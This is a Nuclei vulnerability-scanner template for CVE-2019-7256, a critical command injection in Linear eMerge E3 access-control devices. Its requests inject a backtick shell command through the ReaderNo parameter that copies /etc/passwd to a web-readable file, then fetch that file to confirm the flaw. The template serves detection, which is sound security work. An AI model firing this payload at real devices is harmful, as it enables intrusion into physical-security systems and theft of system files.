nuclei-templates/cves/2019/CVE-2019-7256.yaml

37 lines
865 B
YAML

id: CVE-2019-7256
info:
name: eMerge E3 1.00-06 - Remote Code Execution
author: pikpikcu
severity: critical
description: Linear eMerge E3-Series devices allow Command Injections.
reference:
- https://www.exploit-db.com/exploits/47619
- http://linear-solutions.com/nsc_family/e3-series/
tags: cve,cve2019,emerge,rce
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00
cve-id: CVE-2019-7256
cwe-id: CWE-78
requests:
- raw:
- |
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
Host: {{Hostname}}
- |
GET /nuclei.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"